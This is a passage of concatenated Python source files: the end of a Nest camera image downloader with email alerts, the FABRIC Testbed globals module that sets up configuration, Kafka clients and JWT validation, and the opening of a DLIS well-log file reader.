request.add_header('accept-encoding', 'gzip, deflate, br')
request.add_header('user-agent', 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Mobile Safari/537.36')
request.add_header('referer', 'https://home.nest.com/')
try:
response = self.merlin.open(request)
with open(camera_path + '/' + image_name + '.jpg', 'wb') as image_file:
image_file.write(response.read())
except urllib.request.HTTPError as err:
if err.code == 403:
self.initialize_session()
self.login()
self.initialize_user()
except Exception:
print ('ERROR: Could not download image from URL:')
print (image_url)
traceback.print_exc()
finally:
imgpath = camera_path + '/' + image_name + '.jpg'
if not os.path.exists(imgpath) or os.path.getsize(imgpath) < 100:
with open('tmp_email.txt', 'w') as email:
email.write("To: " + config["email"] + '\nFrom: '
+ config["email"] + '\nSubject: NEST alert\n\nImage '
+ image_name + ' was not captured\n')
call('ssmtp ' + config["email"] + ' < ' + 'tmp_email.txt', shell=True)
os.remove('tmp_email.txt')
else:
try:
shutil.copy2(imgpath, config["storage"][camera])
except:
with open('tmp_email.txt', 'w') as email:
email.write("To: " + config["email"] + '\nFrom: '
+ config["email"] + '\nSubject: NEST alert\n\nImage '
+ image_name + ' was not copied to storage\n')
call('ssmtp ' + config["email"] + ' < ' + 'tmp_email.txt', shell=True)
os.remove('tmp_email.txt')
|
globals.py
|
#!/usr/bin/env python3
# MIT License
#
# Copyright (c) 2020 FABRIC Testbed
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
#
# Author: Komal Thareja (kthare10@renci.org)
from __future__ import annotations
import sched
import sys
import threading
import traceback
from datetime import datetime, timedelta
from typing import TYPE_CHECKING
import logging
import os
from fim.graph.neo4j_property_graph import Neo4jGraphImporter
from fim.graph.resources.abc_arm import ABCARMPropertyGraph
from fss_utils.jwt_validate import JWTValidator
from fabric_cf.actor.core.common.exceptions import InitializationException
from fabric_cf.actor.core.common.constants import Constants
from fabric_cf.actor.core.container.container import Container
from fabric_cf.actor.core.util.log_helper import LogHelper
if TYPE_CHECKING:
from fabric_cf.actor.core.apis.abc_actor_container import ABCActorContainer
from fabric_cf.actor.boot.configuration import Configuration
logging.TRACE = 5
logging.addLevelName(logging.TRACE, "TRACE")
logging.Logger.trace = lambda inst, msg, *args, **kwargs: inst.log(logging.TRACE, msg, *args, **kwargs)
logging.trace = lambda msg, *args, **kwargs: logging.log(logging.TRACE, msg, *args, **kwargs)
class Globals:
config_file = Constants.CONFIGURATION_FILE
RPC_TIMEOUT = 0
def __init__(self):
self.config = None
self.log = None
self.initialized = False
self.started = False
self.start_completed = False
self.container = None
self.properties = None
self.timer_scheduler = sched.scheduler()
self.timer_thread = None
self.timer_condition = threading.Condition()
self.lock = threading.Lock()
self.jwt_validator = None
def make_logger(self):
"""
Detects the path and level for the log file from the actor config and sets
up a logger. Instead of detecting the path and/or level from the
config, a custom path and/or level for the log file can be passed as
optional arguments.
:return: logging.Logger object
"""
log_config = self.config.get_global_config().get_logging()
if log_config is None:
raise RuntimeError('No logging config information available')
log_dir = log_config.get(Constants.PROPERTY_CONF_LOG_DIRECTORY, ".")
log_file = log_config.get(Constants.PROPERTY_CONF_LOG_FILE, "actor.log")
log_level = log_config.get(Constants.PROPERTY_CONF_LOG_LEVEL, None)
log_retain = int(log_config.get(Constants.PROPERTY_CONF_LOG_RETAIN, 50))
log_size = int(log_config.get(Constants.PROPERTY_CONF_LOG_SIZE, 5000000))
logger = log_config.get(Constants.PROPERTY_CONF_LOGGER, "actor")
return LogHelper.make_logger(log_dir=log_dir, log_file=log_file, log_level=log_level, log_retain=log_retain,
log_size=log_size, logger=logger)
@staticmethod
def delete_super_block():
"""
Delete Super block file
"""
if os.path.isfile(Constants.SUPERBLOCK_LOCATION):
os.remove(Constants.SUPERBLOCK_LOCATION)
def create_maintenance_lock(self):
"""
Create Super Block
"""
self.get_logger().debug("Creating maintenance lock")
file = None
try:
file = open(Constants.MAINTENANCE_LOCATION, 'r')
except IOError:
file = open(Constants.MAINTENANCE_LOCATION, 'w')
finally:
if file is not None:
file.close()
@staticmethod
def delete_maintenance_lock():
"""
Delete maintenance block file
"""
if os.path.isfile(Constants.MAINTENANCE_LOCATION):
os.remove(Constants.MAINTENANCE_LOCATION)
@staticmethod
def is_maintenance_mode_on() -> bool:
if os.path.isfile(Constants.MAINTENANCE_LOCATION):
return True
return False
@staticmethod
def can_reload_model() -> bool:
if os.path.isfile(Constants.MODEL_RELOAD_LOCATION):
return True
return False
@staticmethod
def delete_reload_model_state_file():
"""
Delete reload model state file
"""
if os.path.isfile(Constants.MODEL_RELOAD_LOCATION):
os.remove(Constants.MODEL_RELOAD_LOCATION)
def cleanup_neo4j(self):
"""
Cleanup Neo4j on clean restart
"""
self.log.debug("Cleanup Neo4j database started")
config = self.get_config().get_neo4j_config()
neo4j_graph_importer = Neo4jGraphImporter(url=config["url"], user=config["user"],
pswd=config["pass"],
import_host_dir=config["import_host_dir"],
import_dir=config["import_dir"])
neo4j_graph_importer.delete_all_graphs()
self.log.debug("Cleanup Neo4j database completed")
def check_and_reload_model(self, *, graph_id) -> ABCARMPropertyGraph or None:
"""
Reload Neo4j on model restart
"""
if not self.can_reload_model():
return None
self.cleanup_neo4j()
self.log.debug(f"Reload Neo4j database started {graph_id}")
from fabric_cf.actor.fim.fim_helper import FimHelper
arm_graph = FimHelper.get_arm_graph_from_file(filename=self.get_config().get_actor().get_substrate_file(),
graph_id=graph_id)
self.log.debug(f"Reload Neo4j database completed {graph_id}")
return arm_graph
def fail(self, *, e: Exception):
"""
Fail the Actor
@param e exception
"""
self.log.error("Critical error: Actor failed to initialize {}".format(e))
sys.exit(-1)
def initialize(self):
"""
Initialize the container and actor
"""
try:
self.lock.acquire()
if not self.initialized:
self.load_config()
self.log = self.make_logger()
self.log.info("Checking if connection to Kafka broker can be established")
admin_kafka_client = self.get_kafka_admin_client()
admin_kafka_client.list_topics()
self.log.info("Connection to Kafka broker established successfully")
self.load_jwt_validator()
self.log.info("Main initialization complete.")
self.initialized = True
finally:
self.lock.release()
def load_jwt_validator(self):
oauth_config = self.config.get_oauth_config()
CREDMGR_CERTS = oauth_config.get(Constants.PROPERTY_CONF_O_AUTH_JWKS_URL, None)
CREDMGR_KEY_REFRESH = oauth_config.get(Constants.PROPERTY_CONF_O_AUTH_KEY_REFRESH, None)
self.log.info(f'Initializing JWT Validator to use {CREDMGR_CERTS} endpoint, '
f'refreshing keys every {CREDMGR_KEY_REFRESH} HH:MM:SS')
t = datetime.strptime(CREDMGR_KEY_REFRESH, "%H:%M:%S")
self.jwt_validator = JWTValidator(url=CREDMGR_CERTS,
refresh_period=timedelta(hours=t.hour, minutes=t.minute, seconds=t.second))
def load_config(self):
"""
Load the configuration
"""
try:
from fabric_cf.actor.boot.configuration_loader import ConfigurationLoader
loader = ConfigurationLoader(path=self.config_file)
self.config = loader.read_configuration()
self.RPC_TIMEOUT = self.config.get_rpc_request_timeout_seconds()
except Exception as e:
raise RuntimeError("Unable to parse configuration file {}".format(e))
def get_jwt_validator(self):
return self.jwt_validator
def get_container(self) -> ABCActorContainer:
"""
Get the container
@return container
"""
if not self.initialized:
raise InitializationException(Constants.UNINITIALIZED_STATE)
return self.container
def get_config(self) -> Configuration:
"""
Get the configuration
@return config
"""
if not self.initialized:
raise InitializationException(Constants.UNINITIALIZED_STATE)
return self.config
def get_log_config(self) -> dict:
"""
Get the Log configuration
@return dict
"""
return self.get_config().get_log_config()
def get_kafka_config_admin_client(self) -> dict:
"""
Get Kafka Config Admin Client
@retun admin client config
"""
if self.config is None or self.config.get_runtime_config() is None:
return None
sasl_username = self.config.get_kafka_prod_user_name()
sasl_password = self.config.get_kafka_prod_user_pwd()
sasl_mechanism = self.config.get_kafka_sasl_mechanism()
conf = {Constants.BOOTSTRAP_SERVERS: self.config.get_kafka_server(),
Constants.SECURITY_PROTOCOL: self.config.get_kafka_security_protocol(),
Constants.SSL_CA_LOCATION: self.config.get_kafka_ssl_ca_location(),
Constants.SSL_CERTIFICATE_LOCATION: self.config.get_kafka_ssl_cert_location(),
Constants.SSL_KEY_LOCATION: self.config.get_kafka_ssl_key_location(),
Constants.SSL_KEY_PASSWORD: self.config.get_kafka_ssl_key_password()}
if sasl_username is not None and sasl_username != '' and sasl_password is not None and sasl_password != '':
conf[Constants.SASL_USERNAME] = sasl_username
conf[Constants.SASL_PASSWORD] = sasl_password
conf[Constants.SASL_MECHANISM] = sasl_mechanism
return conf
def get_kafka_config_producer(self) -> dict:
"""
Get Producer Config
@return producer config
"""
if self.config is None or self.config.get_runtime_config() is None:
return None
sasl_username = self.config.get_kafka_prod_user_name()
sasl_password = self.config.get_kafka_prod_user_pwd()
sasl_mechanism = self.config.get_kafka_sasl_mechanism()
conf = {Constants.BOOTSTRAP_SERVERS: self.config.get_kafka_server(),
Constants.SECURITY_PROTOCOL: self.config.get_kafka_security_protocol(),
Constants.SSL_CA_LOCATION: self.config.get_kafka_ssl_ca_location(),
Constants.SSL_CERTIFICATE_LOCATION: self.config.get_kafka_ssl_cert_location(),
Constants.SSL_KEY_LOCATION: self.config.get_kafka_ssl_key_location(),
Constants.SSL_KEY_PASSWORD: self.config.get_kafka_ssl_key_password(),
Constants.SCHEMA_REGISTRY_URL: self.config.get_kafka_schema_registry(),
Constants.PROPERTY_CONF_KAFKA_REQUEST_TIMEOUT_MS: self.config.get_kafka_request_timeout_ms()}
if sasl_username is not None and sasl_username != '' and sasl_password is not None and sasl_password != '':
conf[Constants.SASL_USERNAME] = sasl_username
conf[Constants.SASL_PASSWORD] = sasl_password
conf[Constants.SASL_MECHANISM] = sasl_mechanism
return conf
def get_kafka_config_consumer(self) -> dict:
"""
Get Consumer config
@return consumer config
"""
if self.config is None or self.config.get_runtime_config() is None:
return None
conf = self.get_kafka_config_producer()
group_id = self.config.get_kafka_cons_group_id()
conf['auto.offset.reset'] = 'earliest'
sasl_username = self.config.get_kafka_cons_user_name()
sasl_password = self.config.get_kafka_cons_user_pwd()
if sasl_username is not None and sasl_username != '' and sasl_password is not None and sasl_password != '':
conf[Constants.SASL_USERNAME] = sasl_username
conf[Constants.SASL_PASSWORD] = sasl_password
conf[Constants.GROUP_ID] = group_id
return conf
def get_kafka_producer(self):
"""
Create and return a kafka producer
@return producer
"""
conf = self.get_kafka_config_producer()
key_schema_file = self.config.get_kafka_key_schema_location()
value_schema_file = self.config.get_kafka_value_schema_location()
from fabric_mb.message_bus.producer import AvroProducerApi
producer = AvroProducerApi(producer_conf=conf, key_schema_location=key_schema_file,
value_schema_location=value_schema_file, logger=self.get_logger())
return producer
def get_kafka_producer_with_poller(self, *, actor):
"""
Create and return a kafka producer
@return producer
"""
conf = self.get_kafka_config_producer()
key_schema_file = self.config.get_kafka_key_schema_location()
value_schema_file = self.config.get_kafka_value_schema_location()
from fabric_cf.actor.core.container.rpc_producer import RPCProducer
producer = RPCProducer(producer_conf=conf, key_schema_location=key_schema_file,
value_schema_location=value_schema_file, logger=self.get_logger(), actor=actor)
return producer
def get_simple_kafka_producer(self):
"""
Create and return a kafka producer
@return producer
"""
conf = self.get_kafka_config_producer()
if conf is not None:
conf.pop(Constants.SCHEMA_REGISTRY_URL)
bqm_config = self.config.get_global_config().get_bqm_config()
if bqm_config is not None:
prod_user_name = bqm_config.get(Constants.PROPERTY_CONF_KAFKA_SASL_PRODUCER_USERNAME, None)
prod_password = bqm_config.get(Constants.PROPERTY_CONF_KAFKA_SASL_PRODUCER_PASSWORD, None)
if prod_user_name is not None and prod_password is not None:
conf[Constants.SASL_USERNAME] = prod_user_name
conf[Constants.SASL_PASSWORD] = prod_password
from confluent_kafka import Producer
producer = Producer(conf)
return producer
def get_kafka_admin_client(self):
"""
Create and return a kafka admin client
@return admin client
"""
from fabric_mb.message_bus.admin import AdminApi
conf = self.get_kafka_config_admin_client()
admin = AdminApi(conf=conf)
return admin
def get_logger(self):
"""
Get logger
@return logger
"""
if not self.initialized:
raise InitializationException(Constants.UNINITIALIZED_STATE)
if self.log is None:
self.log = self.make_logger()
return self.log
def start(self, *, force_fresh: bool):
"""
Start CF Actor
@param force_fresh true if clean restart, false if stateful restart
"""
try:
try:
self.lock.acquire()
if self.started:
return
self.started = True
self.start_completed = False
if force_fresh:
self.delete_super_block()
finally:
self.lock.release()
self.initialize()
self.start_timer_thread()
try:
self.lock.acquire()
self.container = Container()
self.log.info("Successfully instantiated the container implementation.")
self.log.info("Initializing container")
self.container.initialize(config=self.config)
self.log.info("Successfully initialized the container")
self.start_completed = True
finally:
self.lock.release()
except Exception as e:
self.fail(e=e)
def stop(self):
"""
Stop the Actor
"""
try:
self.lock.acquire()
if not self.started:
return
self.log.info("Stopping Actor")
self.started = False
self.stop_timer_thread()
self.get_container().shutdown()
except Exception as e:
self.log.error("Error while shutting down: {}".format(e))
finally:
self.lock.release()
def start_timer_thread(self):
"""
Start the timer thread
"""
if self.timer_thread is not None:
raise RuntimeError("This timer thread has already been started")
self.timer_thread = threading.Thread(target=self.timer_loop)
self.timer_thread.setName('GlobalTimer')
self.timer_thread.setDaemon(True)
self.timer_thread.start()
def stop_timer_thread(self):
"""
Stop timer thread
"""
temp = self.timer_thread
self.timer_thread = None
if temp is not None:
self.log.warning("It seems that the timer thread is running. Interrupting it")
try:
with self.timer_condition:
self.timer_condition.notify_all()
temp.join()
except Exception as e:
self.log.error("Could not join timer thread {}".format(e))
def timer_loop(self):
"""
Timer thread run function
"""
self.log.debug("Timer thread started")
while True:
with self.timer_condition:
while self.timer_scheduler.empty() and self.started:
try:
#self.log.debug("Waiting for condition")
self.timer_condition.wait()
except InterruptedError as e:
self.log.error(traceback.format_exc())
self.log.error("Timer thread interrupted. Exiting {}".format(e))
return
if not self.started:
self.log.info("Timer thread exiting")
return
self.timer_condition.notify_all()
if not self.timer_scheduler.empty():
#self.log.debug("Executing Scheduled items")
self.timer_scheduler.run(blocking=False)
class GlobalsSingleton:
"""
Global Singleton class
"""
__instance = None
def __init__(self):
if self.__instance is not None:
raise InitializationException("Singleton can't be created twice !")
def get(self):
"""
Actually create an instance
"""
if self.__instance is None:
self.__instance = Globals()
return self.__instance
get = classmethod(get)
|
dlis.py
|
"""
Pyhton DLIS file reader
Adriano Paulo - adrianopaulo@gmail.com
July 2016
PREFACE:
American Petroleum Institute (API) Standard RP66 Version 1 (RP66 V1),
published in May 1991, specified a format for digital well log data,
called Digital Log Interchange Standard (DLIS).
RP66 V1 publication was under jurisdiction of API until June 1998,
when Petrotechnical Open Software Corporation (POSC) accepted its
stewardship.
In November 2006, POSC re-brands itself as Energistics.
PURPOSE:
This software was created to read DLIS files.
At this time only DLIS Version 1 (RP66 V1) is supported.
SOURCES:
This code was developed based on Energistics RP66 V1 standard:
http://w3.energistics.org/RP66/V1/Toc/main.html
USAGE:
(1) To read a DLIS file into memory, just use:
dlis = DLISFile() (mandatory)
dlis.read(filename) (mandatory)
(2) An example of usage (just a example) can be shown with:
dlis.print_logical_file() (optional)
The function above is just a taste of this DLIS reader, it
produces some result like this:
Logical File: 0
1&0&B61441
#1
0&0&INDEX : 1640.375 m
1&0&DT : -999.25 us/ft
1&0&GR : 51.84400177 gAPI
1&0&ILD : 0.0189999993891 ohm.m
1&0&CALI : 12.3409996033 in
1&0&RHOB : 4.29400014877 g/cm3
1&0&NPHI : 0.675999999046 m3/m3
#2
0&0&INDEX : 1640.5 m
1&0&DT : -999.25 us/ft
1&0&GR : 55.9160003662 gAPI
1&0&ILD : 0.0189999993891 ohm.m
1&0&CALI : 12.3509998322 in
1&0&RHOB : 4.29400014877 g/cm3
1&0&NPHI : 0.65030002594 m3/m3
...
#n
(3) For a real usage, use these data structures:
- dlis.data: a list of Logical Wells data. Each Logical Well data
is an OrderedDict containing object name as key and
another OrderedDict as object values, that values are
a OrderedDict too containing data index as key
(e.g #1, #2, #n) and a list of values as a dict value.
This list of values are the real log data values.
The structure is illustrated below.
-> Logical Well Data 1
-> Logical Well Data 2
--> (object_name_1, object_dict_1), where object_dict_1 is:
---> (data_index_1, list_of_values_1)
---> (data_index_2, list_of_values_2)
---> (data_index_n, list_of_values_n)
--> (object_name_2, object_dict_2)
--> (object_name_n, object_dict_n)
-> Logical Well Data n
- dlis.data_props: a list of Logical Wells properties. Each Logical
Well properties is an OrderedDict containing object
name as key and another OrderedDict as values
**** (????) - dlis.SUL: a list of well parameters (header parameters).
- dlis.file_header = None
- dlis.origin = None
- dlis.parameter = None
- dlis.frame = None
- dlis.channel = None
"""
import os
import struct
from collections import OrderedDict
import numpy as np
import app
# from multiprocessing import Process, Queue
# import threading
# import utils
def _get_value(data, format_, big_endian=True):
big = ''
if big_endian:
big = '>'
format_ = big + format_
try:
# print()
# print(data, type(data))
n = struct.unpack(format_, data)
# print(n)
# print(n[0], type(n[0]))
# print()
return n[0]
except Exception:
raise
def get_from_list(data_list, start_offset, code, size=None):
code_spec = RepresentationCodes.get_code(code)
# print()
# print('\nget_from_list', start_offset, code, code_spec)
if code_spec is None:
msg = 'Code ' + str(code) + ' is not recognized.'
raise Exception(msg)
special = code_spec.get('special')
if special is None:
if code_spec.get('size') != "variable":
return start_offset + code_spec.get('size'), \
_get_value(data_list[start_offset:start_offset + \
code_spec.get('size')], \
code_spec.get('format')
)
else:
raise Exception()
if special:
if code == 1:
raise Exception()
'''
v1 = ord(data_list[start_offset:start_offset+1])
v2 = ord(data_list[start_offset+1:start_offset+2])
result = bin(v1)[2:].zfill(8)
result += bin(v2)[2:].zfill(8)
fraction = result[1:12]
exponent = result[12:16]
if result[0] == '0':
exponent = int(exponent, 2)
fraction = int(fraction, 2) / 2. ** 23
value = fraction * 2. ** (exponent)
else:
converted_exponent = ''
for i in range(8):
if exponent[i] == '0':
converted_exponent += '1'
else:
converted_exponent += '0'
exponent = int(converted_exponent, 2)
converted_fraction = ''
achou = False
for i in range(22, -1, -1):
if achou:
if fraction[i] == '0':
converted_fraction = '1' + converted_fraction
else:
converted_fraction = '0' + converted_fraction
else:
converted_fraction = fraction[i] + converted_fraction
if fraction[i] == '1':
achou = True
fraction = int(converted_fraction, 2) / 2. ** 23
fraction = fraction * (-1)
value = fraction * 2. ** (exponent - 128)
return start_offset+2, value
'''
elif code == 2:
values = []
for i in range(4):
v = ord(data_list[start_offset + i:start_offset + i + 1])
values.append(v)
result = ''
for value in values:
result += bin(value)[2:].zfill(8)
exponent = result[1:9]
mantissa = result[9:32]
exponent = int(exponent, 2)
mantissa = int(mantissa, 2) / 2. ** 23
if result[0] == '1':
value = -(1 + mantissa) * 2. ** (exponent - 127)
else:
value = (1 + mantissa) * 2. ** (exponent - 127)
return start_offset + 4, value
elif code == 3:
new_offset, V = get_from_list(data_list, start_offset, 2) # FSINGL
new_offset, A = get_from_list(data_list, new_offset, 2) # FSINGL
# V is a nominal value with a confidence interval of [V - A, V + A]
return new_offset, V, A
elif code == 4:
new_offset, V = get_from_list(data_list, start_offset, 2) # FSINGL
new_offset, A = get_from_list(data_list, new_offset, 2) # FSINGL
new_offset, B = get_from_list(data_list, new_offset, 2) # FSINGL
# V is a nominal value with a confidence interval of [V - A, V + B]
return new_offset, V, A, B
elif code == 5:
values = []
for i in range(4):
v = ord(data_list[start_offset + i:start_offset + i + 1])
values.append(v)
result = ''
for value in values:
result += bin(value)[2:].zfill(8)
exponent = result[1:8]
mantissa = result[8:32]
exponent = int(exponent, 2)
mantissa = int(mantissa, 2)
if result[0] == '1':
value = -1 * mantissa * 16. ** (exponent - 64)
else:
value = mantissa * 16. ** (exponent - 64)
return start_offset + 4, value
#
elif code == 6:
raise Exception('code == 6!!!')
#
elif code == 7:
values = []
for i in range(8):
v = ord(data_list[start_offset + i:start_offset + i + 1])
values.append(v)
result = ''
for value in values:
result += bin(value)[2:].zfill(8)
exponent = result[1:12]
mantissa = result[12:64]
exponent = int(exponent, 2)
mantissa = int(mantissa, 2)
if result[0] == '1':
value = -1 * (1 + mantissa) * 2. ** (exponent - 1023)
else:
value = (1 + mantissa) * 2. ** (exponent - 1023)
return start_offset + 8, value
elif code == 8:
new_offset, V = get_from_list(data_list, start_offset, 7) # FDOUBL
new_offset, A = get_from_list(data_list, new_offset, 7) # FDOUBL
# V is a nominal value with a confidence interval of [V - A, V + A]
return new_offset, V, A
elif code == 9:
new_offset, V = get_from_list(data_list, start_offset, 7) # FDOUBL
new_offset, A = get_from_list(data_list, new_offset, 7) # FDOUBL
new_offset, B = get_from_list(data_list, new_offset, 7) # FDOUBL
# V is a nominal value with a confidence interval of [V - A, V + B]
return new_offset, V, A, B
elif code == 10:
new_offset, R = get_from_list(data_list, start_offset, 2) # FSINGL
new_offset, I = get_from_list(data_list, new_offset, 2) # FSINGL
# Value = R + i* I, i = (-1)1/2
return new_offset, R, I
elif code == 11:
new_offset, R = get_from_list(data_list, start_offset, 7) # FDOUBL
new_offset, I = get_from_list(data_list, new_offset, 7) # FDOUBL
# Value = R + i* I, i = (-1)1/2
return new_offset, R, I
elif code == 18 or code == 22:
# print data_list[start_offset:start_offset+1]
try:
bin_vec = bin(ord(data_list[start_offset:start_offset + 1]))[2:].zfill(8)
except Exception:
print('start_offset:', start_offset, len(data_list))
raise Exception('Verificar IndexError')
if bin_vec[0] == '0':
return start_offset + 1, int(bin_vec, 2)
else:
if bin_vec[1] == '0':
bin_vec = '0' + bin_vec[1:]
bin_vec += bin(ord(data_list[start_offset + 1:start_offset + 2]))[2:].zfill(8)
return start_offset + 2, int(bin_vec, 2)
else:
bin_vec = '00' + bin_vec[2:]
bin_vec += bin(ord(data_list[start_offset + 1:start_offset + 2]))[2:].zfill(8)
bin_vec += bin(ord(data_list[start_offset + 2:start_offset + 3]))[2:].zfill(8)
bin_vec += bin(ord(data_list[start_offset + 3:start_offset + 4]))[2:].zfill(8)
return start_offset + 4, int(bin_vec, 2)
elif code == 19 or code == 27:
new_offset, value = get_from_list(data_list, start_offset, 15) # USHORT
return new_offset + value, \
data_list[new_offset:new_offset + value].decode("utf-8")
elif code == 20:
new_offset, value = get_from_list(data_list, start_offset, 18) # UVARI
return new_offset + value, \
data_list[new_offset:new_offset + value].decode("utf-8")
elif code == 21:
dtime = OrderedDict()
new_offset, year = get_from_list(data_list, start_offset, 15) # USHORT
year = 1900 + year
dtime['Y'] = year
v1 = ord(data_list[new_offset:new_offset + 1])
new_offset += 1
result = bin(v1)[2:].zfill(8)
tz = result[0:4]
m = result[4:8]
dtime['TZ'] = tz
dtime['M'] = m
new_offset, day = get_from_list(data_list, new_offset, 15) # USHORT
dtime['D'] = day
new_offset, hours = get_from_list(data_list, new_offset, 15) # USHORT
dtime['H'] = hours
new_offset, minutes = get_from_list(data_list, new_offset, 15) # USHORT
dtime['MN'] = minutes
new_offset, seconds = get_from_list(data_list, new_offset, 15) # USHORT
dtime['S'] = seconds
new_offset, milliseconds = get_from_list(data_list, new_offset, 16) # UNORM
dtime['MS'] = milliseconds
return new_offset, dtime
elif code == 23:
new_offset, O = get_from_list(data_list, start_offset, 22) # ORIGIN
new_offset, C = get_from_list(data_list, new_offset, 15) # USHORT
new_offset, I = get_from_list(data_list, new_offset, 19) # IDENT
return new_offset, (O, C, I)
# O = Origin Reference
# C = Copy Number
# I = Identifier
elif code == 24:
new_offset, T = get_from_list(data_list, start_offset, 19) # IDENT
new_offset, N = get_from_list(data_list, new_offset, 23) # OBNAME
objref = OrderedDict()
objref['T'] = T
objref['N'] = N
# T = obj type - N = obj name
return new_offset, objref
elif code == 25:
new_offset, T = get_from_list(data_list, start_offset, 19) # IDENT
new_offset, N = get_from_list(data_list, start_offset, 23) # OBNAME
new_offset, T = get_from_list(data_list, start_offset, 19) # IDENT
raise Exception()
# T = Object Type
# N = Object Name
# L = Attribute Label
elif code == 26:
new_offset, value = get_from_list(data_list, start_offset, 15) # USHORT
if value == 0:
return False
if value == 1:
return True
raise Exception()
elif code == 28:
v1 = ord(data_list[start_offset:start_offset + 1])
result = bin(v1)[2:].zfill(8)
ret = []
for i in range(len(result)):
ret.append(int(result[i]))
return start_offset + 1, ret
"""
0: Logical Record Structure
0 = Indirectly Formatted Logical Record
1 = Explicitly Formatted Logical Record
1: Predecessor
0 = This is the first segment of the Logical Record
1 = This is not the first segment of the Logical Record
2: Successor
0 = This is the last Segment of the Logical Record.
1 = This is not the last Segment of the Logical Record
3: Encryption
0 = No encryption.
1 = Logical Record is encrypted
4: Encryption Packet
0 = No Logical Record Segment Encryption Packet
1 = Logical Record Segment Encryption Packet is present
5: Checksum
0 = No checksum
1 = A checksum is present in the LRST
6: Trailing Length
0 = No Trailing Length
1 = A copy of the LRS lengt is present in the LRST
7: Padding
0 = No record padding
1 = Pad bytes are present in LRST
"""
"""
Given a Explicitly Formatted Logical Record (EFLR) code, returns its type,
description and allowed set types.
"""
'''
def get_EFLR_for_code(EFLR_code):
if not isinstance(EFLR_code, int):
raise Exception('EFLR_code must be a int value.')
if EFLR_code < 0 or EFLR_code > 127:
raise Exception('EFLR code does not exist.')
if EFLR_code > 11:
raise Exception('Undefined or reserved EFLR code are not available at this time.')
ret = {}
if EFLR_code == 0:
ret['type'] = 'FHLR'
ret['desc'] = 'File Header'
ret['allow'] = ['FILE-HEADER']
elif EFLR_code == 1:
ret['type'] = 'OLR'
ret['desc'] = 'Origin'
ret['allow'] = ['ORIGIN', 'WELL-REFERENCE']
elif EFLR_code == 2:
ret['type'] = 'AXIS'
ret['desc'] = 'Coordinate Axis'
ret['allow'] = ['AXIS']
elif EFLR_code == 3:
ret['type'] = 'CHANNL'
ret['desc'] = 'Channel-related information'
ret['allow'] = ['CHANNEL']
elif EFLR_code == 4:
ret['type'] = 'FRAME'
ret['desc'] = 'Frame Data'
ret['allow'] = ['FRAME', 'PATH']
elif EFLR_code == 5:
ret['type'] = 'STATIC'
ret['desc'] = 'Static Data'
ret['allow'] = ['CALIBRATION', 'CALIBRATION-COEFFICIENT', \
'CALIBRATION-MEASUREMENT', 'COMPUTATION', 'EQUIPMENT', 'GROUP',\
'PARAMETER', 'PROCESS', 'SPICE', 'TOOL', 'ZONE']
elif EFLR_code == 6:
ret['type'] = 'SCRIPT'
ret['desc'] = 'Textual Data'
ret['allow'] = ['COMMENT']
elif EFLR_code == 7:
ret['type'] = 'UPDATE'
ret['desc'] = 'Update Data'
ret['allow'] = ['UPDATE']
elif EFLR_code == 8:
ret['type'] = 'UDI'
ret['desc'] = 'Unformatted Data Identifier'
ret['allow'] = ['NO-FORMAT']
elif EFLR_code == 9:
ret['type'] = 'LNAME'
ret['desc'] = 'Long Name'
ret['allow'] = ['LONG-NAME']
elif EFLR_code == 10:
ret['type'] = 'SPEC'
ret['desc'] = 'Specificfation'
ret['allow'] = ['ATTRIBUTE', 'CODE', 'EFLR', 'IFLR', 'OBJECT-TYPE',\
'REPRESENTATION-CODE', 'SPECIFICATION', 'UNIT-SYMBOL']
elif EFLR_code == 11:
ret['type'] = 'DICT'
ret['desc'] = 'Dictionary'
ret['allow'] = ['BASE-DICTIONARY', 'IDENTIFIER', 'LEXICON', 'OPTION']
return ret
'''
def get_objname_from_tuple(obj_name_tuple):
"""Given a O, C, I tuple, return its string full name
(e.g 0&0&DEFINING_ORIGIN).
"""
O, C, I = obj_name_tuple
return str(O) + '&' + str(C) + '&' + I
def get_actual_objname(full_object_name):
"""Given a object string full name (e.g 0&0&DEFINING_ORIGIN), returns
its name (e.g DEFINING_ORIGIN).
"""
return full_object_name.split('&')[2]
class RepresentationCodes(object):
instance = None
def __init__(self):
# base_path == this floder
base_path = os.path.dirname(os.path.abspath(__file__))
rc_json_file = 'representation_codes.json'
self.codes = app.app_utils.read_json_file(
os.path.join(base_path, rc_json_file)
)
@classmethod
def start(cls):
if cls.instance is None:
cls.instance = RepresentationCodes()
@classmethod
def get_code(cls, code):
val = None
if cls.instance:
val = cls.instance.codes[code - 1]
return val
class DLISObjectPool(object):
current_file_number = -1
current_lr = -1
lrs = None
objects = None
lr_to_object = None
object_to_lr = None
@classmethod
def init_pool(cls):
"""Init DLISObjectPool attributes.
"""
cls.current_file_number = -1
cls.current_lr = -1
cls.lrs = OrderedDict()
cls.objects = OrderedDict()
cls.lr_to_object = OrderedDict()
cls.object_to_lr = OrderedDict()
@classmethod
def register_logical_record(cls, lr_structure_type, lr_type, lr_code):
"""Register a new Logical Record, with its structure type, LR type,
LR code.
"""
if lr_structure_type != 0 and lr_structure_type != 1:
raise Exception('Logical Record Structure type invalid. ' +
'Valid types are 0 for IFLRs or 1 for EFLR.')
# Starting a new logical file
if lr_type == 'FILE-HEADER':
if cls.lrs is None:
cls.init_pool()
cls.current_file_number += 1
cls.lrs[cls.current_file_number] = OrderedDict()
cls.lr_to_object[cls.current_file_number] = OrderedDict()
cls.object_to_lr[cls.current_file_number] = OrderedDict()
cls.current_lr = 0
else:
cls.current_lr += 1
new_set = OrderedDict()
